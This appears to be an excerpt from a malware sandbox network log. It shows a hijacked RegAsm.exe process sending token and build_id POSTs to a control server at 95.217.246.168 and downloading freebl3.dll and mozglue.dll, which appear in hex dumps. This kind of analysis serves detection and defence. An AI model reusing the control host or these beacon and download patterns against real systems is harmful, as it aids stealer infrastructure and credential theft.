$VD $)$$V< $8$

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.2.4	49739	95.217.246.168	443	7344	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
2024-04-26 19:35:24 UTC	264	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----CGHCFBAAAFHJDGCBFIIJ User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:109.0) Gecko/20100101 Firefox/115.0 Host: 95.217.246.168 Content-Length: 4677 Connection: Keep-Alive Cache-Control: no-cache
2024-04-26 19:35:24 UTC	4677	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 43 47 48 43 46 42 41 41 41 46 48 4a 44 47 43 42 46 49 49 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 65 39 32 34 64 64 63 64 37 62 66 30 33 62 66 63 34 30 62 64 34 65 33 62 37 65 31 32 39 35 64 36 0d 0a 2d 2d 2d 2d 2d 2d 43 47 48 43 46 42 41 41 41 46 48 4a 44 47 43 42 46 49 49 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 32 61 39 36 31 35 33 66 65 65 66 65 38 39 63 66 33 39 66 39 37 64 30 32 61 32 30 30 31 65 30 31 0d 0a 2d 2d 2d 2d 2d 2d 43 47 48 43 46 42 41 41 41 46 48 4a 44 47 43 42 46 49 49 4a 0d 0a 43 6f 6e 74 Data Ascii: ------CGHCFBAAAFHJDGCBFIIJContent-Disposition: form-data; name="token"e924ddcd7bf03bfc40bd4e3b7e1295d6------CGHCFBAAAFHJDGCBFIIJContent-Disposition: form-data; name="build_id"2a96153feefe89cf39f97d02a2001e01------CGHCFBAAAFHJDGCBFIIJCont
2024-04-26 19:35:25 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Fri, 26 Apr 2024 19:35:25 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2024-04-26 19:35:25 UTC	12	IN	Data Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a Data Ascii: 2ok0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
8	192.168.2.4	49740	95.217.246.168	443	7344	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
2024-04-26 19:35:26 UTC	264	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----KJJECGHJDBFIJJJKEHCB User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:109.0) Gecko/20100101 Firefox/115.0 Host: 95.217.246.168 Content-Length: 1529 Connection: Keep-Alive Cache-Control: no-cache
2024-04-26 19:35:26 UTC	1529	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 4b 4a 4a 45 43 47 48 4a 44 42 46 49 4a 4a 4a 4b 45 48 43 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 65 39 32 34 64 64 63 64 37 62 66 30 33 62 66 63 34 30 62 64 34 65 33 62 37 65 31 32 39 35 64 36 0d 0a 2d 2d 2d 2d 2d 2d 4b 4a 4a 45 43 47 48 4a 44 42 46 49 4a 4a 4a 4b 45 48 43 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 32 61 39 36 31 35 33 66 65 65 66 65 38 39 63 66 33 39 66 39 37 64 30 32 61 32 30 30 31 65 30 31 0d 0a 2d 2d 2d 2d 2d 2d 4b 4a 4a 45 43 47 48 4a 44 42 46 49 4a 4a 4a 4b 45 48 43 42 0d 0a 43 6f 6e 74 Data Ascii: ------KJJECGHJDBFIJJJKEHCBContent-Disposition: form-data; name="token"e924ddcd7bf03bfc40bd4e3b7e1295d6------KJJECGHJDBFIJJJKEHCBContent-Disposition: form-data; name="build_id"2a96153feefe89cf39f97d02a2001e01------KJJECGHJDBFIJJJKEHCBCont
2024-04-26 19:35:27 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Fri, 26 Apr 2024 19:35:27 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2024-04-26 19:35:27 UTC	12	IN	Data Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a Data Ascii: 2ok0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
9	192.168.2.4	49741	95.217.246.168	443	7344	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
2024-04-26 19:35:27 UTC	263	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----KJJECGHJDBFIJJJKEHCB User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:109.0) Gecko/20100101 Firefox/115.0 Host: 95.217.246.168 Content-Length: 437 Connection: Keep-Alive Cache-Control: no-cache
2024-04-26 19:35:27 UTC	437	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 4b 4a 4a 45 43 47 48 4a 44 42 46 49 4a 4a 4a 4b 45 48 43 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 65 39 32 34 64 64 63 64 37 62 66 30 33 62 66 63 34 30 62 64 34 65 33 62 37 65 31 32 39 35 64 36 0d 0a 2d 2d 2d 2d 2d 2d 4b 4a 4a 45 43 47 48 4a 44 42 46 49 4a 4a 4a 4b 45 48 43 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 32 61 39 36 31 35 33 66 65 65 66 65 38 39 63 66 33 39 66 39 37 64 30 32 61 32 30 30 31 65 30 31 0d 0a 2d 2d 2d 2d 2d 2d 4b 4a 4a 45 43 47 48 4a 44 42 46 49 4a 4a 4a 4b 45 48 43 42 0d 0a 43 6f 6e 74 Data Ascii: ------KJJECGHJDBFIJJJKEHCBContent-Disposition: form-data; name="token"e924ddcd7bf03bfc40bd4e3b7e1295d6------KJJECGHJDBFIJJJKEHCBContent-Disposition: form-data; name="build_id"2a96153feefe89cf39f97d02a2001e01------KJJECGHJDBFIJJJKEHCBCont
2024-04-26 19:35:28 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Fri, 26 Apr 2024 19:35:28 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2024-04-26 19:35:28 UTC	12	IN	Data Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a Data Ascii: 2ok0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
10	192.168.2.4	49742	95.217.246.168	443	7344	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
2024-04-26 19:35:28 UTC	263	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----KJJJDHDGDAAKECAKJDAE User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:109.0) Gecko/20100101 Firefox/115.0 Host: 95.217.246.168 Content-Length: 437 Connection: Keep-Alive Cache-Control: no-cache
2024-04-26 19:35:28 UTC	437	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 4b 4a 4a 4a 44 48 44 47 44 41 41 4b 45 43 41 4b 4a 44 41 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 65 39 32 34 64 64 63 64 37 62 66 30 33 62 66 63 34 30 62 64 34 65 33 62 37 65 31 32 39 35 64 36 0d 0a 2d 2d 2d 2d 2d 2d 4b 4a 4a 4a 44 48 44 47 44 41 41 4b 45 43 41 4b 4a 44 41 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 32 61 39 36 31 35 33 66 65 65 66 65 38 39 63 66 33 39 66 39 37 64 30 32 61 32 30 30 31 65 30 31 0d 0a 2d 2d 2d 2d 2d 2d 4b 4a 4a 4a 44 48 44 47 44 41 41 4b 45 43 41 4b 4a 44 41 45 0d 0a 43 6f 6e 74 Data Ascii: ------KJJJDHDGDAAKECAKJDAEContent-Disposition: form-data; name="token"e924ddcd7bf03bfc40bd4e3b7e1295d6------KJJJDHDGDAAKECAKJDAEContent-Disposition: form-data; name="build_id"2a96153feefe89cf39f97d02a2001e01------KJJJDHDGDAAKECAKJDAECont
2024-04-26 19:35:29 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Fri, 26 Apr 2024 19:35:29 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2024-04-26 19:35:29 UTC	12	IN	Data Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a Data Ascii: 2ok0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
11	192.168.2.4	49744	95.217.246.168	443	7344	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
2024-04-26 19:35:29 UTC	158	OUT	GET /freebl3.dll HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:109.0) Gecko/20100101 Firefox/115.0 Host: 95.217.246.168 Cache-Control: no-cache
2024-04-26 19:35:30 UTC	246	IN	HTTP/1.1 200 OK Server: nginx Date: Fri, 26 Apr 2024 19:35:30 GMT Content-Type: application/octet-stream Content-Length: 685392 Last-Modified: Mon, 05 Sep 2022 07:49:08 GMT Connection: close ETag: "6315a9f4-a7550" Accept-Ranges: bytes
2024-04-26 19:35:30 UTC	16138	IN	Data Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 f3 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 0e 08 00 00 34 02 00 00 00 00 00 70 12 08 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 d0 0a 00 00 04 00 00 cb fd 0a 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 48 1c 0a 00 53 00 00 00 9b 1c 0a 00 c8 00 00 Data Ascii: MZx@x!L!This program cannot be run in DOS mode.$PEL4c"!4p@AHS
2024-04-26 19:35:30 UTC	16384	IN	Data Raw: 89 7d c8 89 f2 31 fa 8b 4d 98 31 c1 89 ce 0f a4 d6 10 89 b5 58 ff ff ff 0f ac d1 10 89 4d 98 8b 7d ec 01 cf 89 7d ec 8b 55 e0 11 f2 89 55 e0 31 d3 8b 4d 8c 31 f9 89 da 0f a4 ca 01 89 55 88 0f a4 d9 01 89 4d 8c 8b 5d d4 03 9d 20 ff ff ff 8b 45 cc 13 85 48 ff ff ff 03 5d 94 13 45 9c 89 45 cc 8b bd 7c ff ff ff 31 c7 8b 45 a8 31 d8 89 45 a8 8b 4d c4 01 f9 89 4d c4 8b 75 bc 11 c6 89 75 bc 8b 55 94 31 ca 8b 4d 9c 31 f1 89 d0 0f a4 c8 08 0f a4 d1 08 89 4d 9c 03 9d 04 ff ff ff 8b 75 cc 13 b5 08 ff ff ff 01 cb 89 5d d4 11 c6 89 75 cc 8b 4d a8 31 f1 31 df 89 fa 0f a4 ca 10 89 55 94 0f ac cf 10 89 bd 7c ff ff ff 8b 75 c4 01 fe 89 75 c4 8b 4d bc 11 d1 89 4d bc 31 c8 8b 5d 9c 31 f3 89 c1 0f a4 d9 01 89 8d 78 ff ff ff 0f a4 c3 01 89 5d 9c 8b 45 b8 03 85 30 ff ff ff 8b Data Ascii: }1M1XM}}UU1M1UM] EH]EE\|1E1EMMuuU1M1Mu]uM11U\|uuMM1]1x]E0
2024-04-26 19:35:30 UTC	16384	IN	Data Raw: 00 89 90 98 00 00 00 8b 4d e8 89 fa 31 ca c1 c2 08 31 d1 89 d6 89 88 a4 00 00 00 8b 4d d8 8b 55 d4 31 ca c1 c2 08 89 b0 a0 00 00 00 31 d1 89 88 ac 00 00 00 89 90 a8 00 00 00 8b 4d c0 8b 55 c4 31 d1 c1 c1 08 31 ca 89 90 b4 00 00 00 8b 95 54 ff ff ff 8b 75 bc 31 d6 c1 c6 08 89 88 b0 00 00 00 31 f2 89 90 bc 00 00 00 89 b0 b8 00 00 00 81 c4 d8 00 00 00 5e 5f 5b 5d c3 cc cc cc cc cc cc cc cc cc cc cc cc 55 89 e5 53 57 56 81 ec 00 01 00 00 89 95 78 ff ff ff 89 cf ff 31 e8 a2 90 07 00 83 c4 04 89 45 bc ff 77 04 e8 94 90 07 00 83 c4 04 89 45 b8 ff 77 08 e8 86 90 07 00 83 c4 04 89 45 c0 ff 77 0c e8 78 90 07 00 83 c4 04 89 45 dc ff 77 10 e8 6a 90 07 00 83 c4 04 89 c6 ff 77 14 e8 5d 90 07 00 83 c4 04 89 c3 ff 77 18 e8 50 90 07 00 83 c4 04 89 45 e8 ff 77 1c e8 42 90 Data Ascii: M11MU11MU11Tu11^_[]USWVx1EwEwEwxEwjw]wPEwB
2024-04-26 19:35:30 UTC	16384	IN	Data Raw: 01 00 00 30 43 01 8a 87 1a 01 00 00 30 43 02 8a 87 1b 01 00 00 30 43 03 8a 87 1c 01 00 00 30 43 04 8a 87 1d 01 00 00 30 43 05 8a 87 1e 01 00 00 30 43 06 8a 87 1f 01 00 00 30 43 07 8a 87 20 01 00 00 30 43 08 8a 87 21 01 00 00 30 43 09 8a 87 22 01 00 00 30 43 0a 8a 87 23 01 00 00 30 43 0b 8a 87 24 01 00 00 30 43 0c 8a 87 25 01 00 00 30 43 0d 8a 87 26 01 00 00 30 43 0e 8a 87 27 01 00 00 30 43 0f 0f 10 45 e0 0f 11 87 18 01 00 00 8b 4d f0 31 e9 e8 ad 4e 07 00 31 c0 83 c4 1c 5e 5f 5b 5d c3 cc cc cc 55 89 e5 68 28 01 00 00 e8 42 50 07 00 83 c4 04 5d c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc 55 89 e5 53 57 56 83 ec 24 8b 4d 0c a1 b4 30 0a 10 31 e8 89 45 f0 85 c9 74 50 8b 45 10 8d 50 f0 83 fa 10 77 45 be 01 01 01 00 0f a3 d6 73 3b 8b 75 18 83 fe 02 73 33 8b 7d Data Ascii: 0C0C0C0C0C0C0C 0C!0C"0C#0C$0C%0C&0C'0CEM1N1^_[]Uh(BP]USWV$M01EtPEPwEs;us3}
2024-04-26 19:35:31 UTC	16384	IN	Data Raw: 89 5e 1c c1 e8 18 33 0c 85 70 3f 08 10 89 56 20 8b 45 f0 8b 5d ec 29 d8 05 33 37 ef c6 0f b6 d4 8b 14 95 70 37 08 10 0f b6 f0 33 14 b5 70 33 08 10 89 c6 c1 ee 0e 81 e6 fc 03 00 00 33 96 70 3b 08 10 8b 75 e0 89 7e 24 c1 e8 18 33 14 85 70 3f 08 10 89 4e 28 89 56 2c 8b 45 e8 89 c7 0f a4 df 08 0f a4 c3 08 89 5d ec 8b 45 e4 01 f8 05 99 91 21 72 0f b6 cc 8b 0c 8d 70 37 08 10 0f b6 d0 33 0c 95 70 33 08 10 89 c2 c1 ea 0e 81 e2 fc 03 00 00 33 8a 70 3b 08 10 c1 e8 18 33 0c 85 70 3f 08 10 89 4e 30 8b 75 f0 89 f1 29 d9 81 c1 67 6e de 8d 0f b6 c5 8b 04 85 70 37 08 10 0f b6 d1 33 04 95 70 33 08 10 89 ca c1 ea 0e 81 e2 fc 03 00 00 33 82 70 3b 08 10 c1 e9 18 33 04 8d 70 3f 08 10 89 f1 8b 55 e4 0f a4 d6 18 89 75 e8 0f ac d1 08 89 cb 89 4d f0 8d 14 3e 81 c2 31 23 43 e4 0f Data Ascii: ^3p?V E])37p73p33p;u~$3p?N(V,E]E!rp73p33p;3p?N0u)gnp73p33p;3p?UuM>1#C
2024-04-26 19:35:31 UTC	16384	IN	Data Raw: 04 00 83 c4 04 85 c0 89 7d a8 0f 88 d4 01 00 00 8d 45 d0 50 e8 ed 59 04 00 83 c4 04 85 c0 0f 88 c0 01 00 00 8d 45 c0 50 e8 d9 59 04 00 83 c4 04 85 c0 0f 88 ac 01 00 00 8d 45 b0 50 e8 c5 59 04 00 83 c4 04 89 c3 85 c0 0f 88 98 01 00 00 8d 46 04 8b 4d ac 83 c1 04 50 51 57 e8 ae d0 06 00 83 c4 0c 89 c7 85 c0 0f 85 7c 01 00 00 8b 45 ac ff 70 0c ff 70 08 8d 45 c0 50 e8 48 d7 04 00 83 c4 0c 89 c3 85 c0 0f 88 5b 01 00 00 8d 46 10 8b 4d ac 83 c1 10 50 51 ff 75 a8 e8 6f d0 06 00 83 c4 0c 89 c7 85 c0 0f 85 3d 01 00 00 8b 45 ac ff 70 18 ff 70 14 8d 45 e0 50 e8 09 d7 04 00 83 c4 0c 89 c3 85 c0 0f 88 1c 01 00 00 8b 4e 0c b8 40 00 00 00 81 f9 7f 07 00 00 77 2c b8 30 00 00 00 81 f9 bf 03 00 00 77 1f b8 20 00 00 00 81 f9 7f 01 00 00 77 12 31 c0 81 f9 00 01 00 00 0f 93 c0 Data Ascii: }EPYEPYEPYFMPQW\|EppEPH[FMPQuo=EppEPN@w,0w w1
2024-04-26 19:35:31 UTC	16384	IN	Data Raw: 24 60 50 e8 4e 1c 04 00 83 c4 04 8d 44 24 50 50 e8 41 1c 04 00 83 c4 04 8d 44 24 40 50 e8 34 1c 04 00 83 c4 04 8d 44 24 30 50 e8 27 1c 04 00 83 c4 04 8d 44 24 20 50 e8 1a 1c 04 00 83 c4 04 83 c6 04 83 fe 04 77 1a b8 13 e0 ff ff ff 24 b5 74 55 08 10 b8 05 e0 ff ff eb 0c b8 02 e0 ff ff eb 05 b8 01 e0 ff ff 50 e8 7d 90 06 00 83 c4 04 e9 75 fb ff ff cc cc 55 89 e5 53 57 56 81 ec ac 00 00 00 89 cb 8b 4d 0c a1 b4 30 0a 10 31 e8 89 45 f0 8b 73 08 83 c6 07 c1 ee 03 85 c9 74 1b 8b 41 04 80 38 04 0f 85 c2 01 00 00 8d 04 36 83 c0 01 39 41 08 0f 85 b3 01 00 00 89 95 48 ff ff ff c7 45 ec 00 00 00 00 c7 45 dc 00 00 00 00 c7 45 cc 00 00 00 00 c7 45 bc 00 00 00 00 c7 45 ac 00 00 00 00 c7 45 9c 00 00 00 00 c7 45 8c 00 00 00 00 c7 85 7c ff ff ff 00 00 00 00 c7 85 6c ff ff Data Ascii: $`PND$PPAD$@P4D$0P'D$ Pw$tUP}uUSWVM01EstA869AHEEEEEEE\|l
2024-04-26 19:35:31 UTC	16384	IN	Data Raw: 89 f8 f7 65 c4 89 95 4c fd ff ff 89 85 58 fd ff ff 89 f8 f7 65 d4 89 95 ac fd ff ff 89 85 b4 fd ff ff 89 f8 f7 65 d8 89 95 30 fe ff ff 89 85 40 fe ff ff 89 f8 f7 65 e4 89 95 a0 fe ff ff 89 85 a4 fe ff ff 89 f8 f7 65 e0 89 95 c4 fe ff ff 89 85 cc fe ff ff 89 f8 f7 65 dc 89 95 ec fe ff ff 89 85 f0 fe ff ff 89 d8 f7 e7 89 95 10 ff ff ff 89 85 18 ff ff ff 8b 75 94 89 f0 f7 65 9c 89 85 30 fd ff ff 89 55 88 8b 45 c8 8d 14 00 89 f0 f7 e2 89 95 90 fd ff ff 89 85 98 fd ff ff 89 f0 f7 65 c4 89 95 f0 fd ff ff 89 85 f8 fd ff ff 89 f0 f7 65 90 89 55 90 89 85 9c fe ff ff 89 f0 f7 65 d8 89 95 b8 fe ff ff 89 85 bc fe ff ff 89 f0 f7 65 ec 89 95 e4 fe ff ff 89 85 e8 fe ff ff 89 f0 f7 65 e0 89 95 20 ff ff ff 89 85 24 ff ff ff 89 f0 f7 65 f0 89 95 28 ff ff ff 89 85 30 ff ff Data Ascii: eLXee0@eeeue0UEeeUeee $e(0
2024-04-26 19:35:31 UTC	16384	IN	Data Raw: 89 4d bc 8b 4f 28 89 4d a8 89 75 c8 89 45 d8 8b 47 24 89 45 c0 8b 77 20 89 75 ac 8b 4f 08 89 4d e0 89 f8 89 7d ec 8b 5d a8 01 d9 8b 3f 01 f7 89 7d cc 8b 70 04 13 75 c0 89 75 b8 83 d1 00 89 4d d0 0f 92 45 b4 8b 70 0c 8b 55 bc 01 d6 8b 48 10 8b 45 d4 11 c1 0f 92 45 90 01 d6 11 c1 0f 92 45 e8 01 c6 89 45 d4 13 4d e4 0f 92 45 f0 01 5d e0 0f b6 7d b4 8d 04 06 11 c7 0f 92 45 b4 8b 45 c0 01 45 cc 11 5d b8 8b 45 bc 8b 55 d0 8d 1c 02 83 d3 00 89 5d e0 0f 92 c3 01 c2 0f b6 db 8b 45 e4 8d 14 07 11 d3 89 5d d0 0f 92 c2 03 75 d4 0f b6 45 b4 8b 5d e4 8d 34 19 11 f0 89 45 9c 0f 92 45 a4 01 df 0f b6 d2 8b 75 c8 8d 34 30 11 f2 0f 92 45 df 80 45 90 ff 8b 75 ec 8b 46 14 89 45 94 8d 04 03 89 df 83 d0 00 89 45 b4 0f 92 45 98 80 45 e8 ff 8d 1c 18 89 7d e4 83 d3 00 0f 92 45 8c Data Ascii: MO(MuEG$Ew uOM}]?}puuMEpUHEEEEME]}EEE]EU]E]uE]4EEu40EEuFEEEE}E
2024-04-26 19:35:31 UTC	16384	IN	Data Raw: ff ff 89 f8 81 e7 ff ff ff 01 8d 0c fe 89 d6 c1 ee 1d 01 f1 89 8d 04 ff ff ff c1 e8 19 8b bd 30 ff ff ff 89 fe 81 e7 ff ff ff 03 8d 3c f8 89 c8 c1 e8 1c 01 c7 c1 ee 1a 8b 9d 34 ff ff ff 89 d8 81 e3 ff ff ff 01 8d 1c de 89 fe c1 ee 1d 01 f3 c1 e8 19 8b b5 38 ff ff ff 89 f1 81 e6 ff ff ff 03 8d 04 f0 89 de c1 ee 1c 01 f0 89 c6 25 ff ff ff 1f 89 85 38 ff ff ff c1 e9 1a c1 ee 1d 8d 04 0e 01 f1 83 c1 ff 89 8d 14 ff ff ff 8b 8d 0c ff ff ff c1 e1 03 81 e1 f8 ff ff 1f 8d 0c 41 89 8d 18 ff ff ff 8b b5 10 ff ff ff 81 e6 ff ff ff 0f 89 c1 c1 e1 0b 29 ce 8b 8d 14 ff ff ff c1 e9 1f 89 8d 14 ff ff ff 83 c1 ff 89 ca 81 e2 00 00 00 10 01 d6 89 b5 24 ff ff ff 8b b5 08 ff ff ff 81 e6 ff ff ff 1f 89 ca 81 e2 ff ff ff 1f 01 d6 89 b5 28 ff ff ff 8b b5 04 ff ff ff 81 e6 ff ff Data Ascii: 0<48%8A)$(

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
12	192.168.2.4	49749	95.217.246.168	443	7344	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
2024-04-26 19:35:32 UTC	158	OUT	GET /mozglue.dll HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:109.0) Gecko/20100101 Firefox/115.0 Host: 95.217.246.168 Cache-Control: no-cache
2024-04-26 19:35:33 UTC	246	IN	HTTP/1.1 200 OK Server: nginx Date: Fri, 26 Apr 2024 19:35:32 GMT Content-Type: application/octet-stream Content-Length: 608080 Last-Modified: Mon, 05 Sep 2022 07:49:08 GMT Connection: close ETag: "6315a9f4-94750" Accept-Ranges: bytes
2024-04-26 19:35:33 UTC	16138	IN	Data Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 07 00 a4 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 b6 07 00 00 5e 01 00 00 00 00 00 c0 b9 03 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 80 09 00 00 04 00 00 6a aa 09 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 01 60 08 00 e3 57 00 00 e4 b7 08 00 2c 01 00 Data Ascii: MZx@x!L!This program cannot be run in DOS mode.$PEL4c"!^j@A`W,
2024-04-26 19:35:33 UTC	16384	IN	Data Raw: ff ff 8d 41 24 50 e8 fb 7e 01 00 83 c4 04 89 c1 83 c0 23 83 e0 e0 89 48 fc e9 62 ff ff ff 8d 41 24 50 e8 df 7e 01 00 83 c4 04 89 c1 83 c0 23 83 e0 e0 89 48 fc eb 92 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 55 89 e5 56 8b 75 0c 8b 8e b0 00 00 00 83 f9 10 0f 83 e4 00 00 00 c7 86 ac 00 00 00 00 00 00 00 c7 86 b0 00 00 00 0f 00 00 00 c6 86 9c 00 00 00 00 8b 8e 98 00 00 00 83 f9 10 0f 83 e0 00 00 00 c7 86 94 00 00 00 00 00 00 00 c7 86 98 00 00 00 0f 00 00 00 c6 86 84 00 00 00 00 8b 8e 80 00 00 00 83 f9 10 0f 83 dc 00 00 00 c7 46 7c 00 00 00 00 c7 86 80 00 00 00 0f 00 00 00 c6 46 6c 00 8b 4e 68 83 f9 10 0f 83 de 00 00 00 c7 46 64 00 00 00 00 c7 46 68 0f 00 00 00 c6 46 54 00 8b 4e 50 83 f9 10 0f 83 e3 00 00 00 c7 46 4c 00 00 00 00 c7 46 50 0f 00 00 00 c6 46 Data Ascii: A$P~#HbA$P~#HUVuF\|FlNhFdFhFTNPFLFPF
2024-04-26 19:35:33 UTC	16384	IN	Data Raw: 0f 86 bd 05 00 00 50 e8 7a d3 01 00 83 c4 04 e9 e1 f9 ff ff 8b 45 90 81 c1 01 f0 ff ff 81 f9 ff ef ff ff 0f 86 b4 05 00 00 50 e8 57 d3 01 00 83 c4 04 e9 dc f9 ff ff 8b 85 78 ff ff ff 81 c1 01 f0 ff ff 81 f9 ff ef ff ff 0f 86 a8 05 00 00 50 e8 31 d3 01 00 83 c4 04 e9 d4 f9 ff ff 8b 85 60 ff ff ff 81 c1 01 f0 ff ff 81 f9 ff ef ff ff 0f 86 9c 05 00 00 50 e8 0b d3 01 00 83 c4 04 e9 d2 f9 ff ff 8b 85 48 ff ff ff 81 c1 01 f0 ff ff 81 f9 ff ef ff ff 0f 86 90 05 00 00 50 e8 e5 d2 01 00 83 c4 04 e9 d6 f9 ff ff 8b b5 24 ff ff ff 89 0e 8b 85 2c ff ff ff 89 46 04 8b 4d f0 31 e9 e8 52 27 03 00 89 f0 81 c4 d0 00 00 00 5e 5f 5b 5d c3 89 f1 89 fa ff b5 30 ff ff ff e9 30 f4 ff ff 89 f1 81 c6 4c ff ff ff 39 c8 74 63 8d 8d 3c ff ff ff 56 e8 de bc ff ff 89 f1 89 fa e8 d5 f1 Data Ascii: PzEPWxP1`PHP$,FM1R'^_[]00L9tc<V
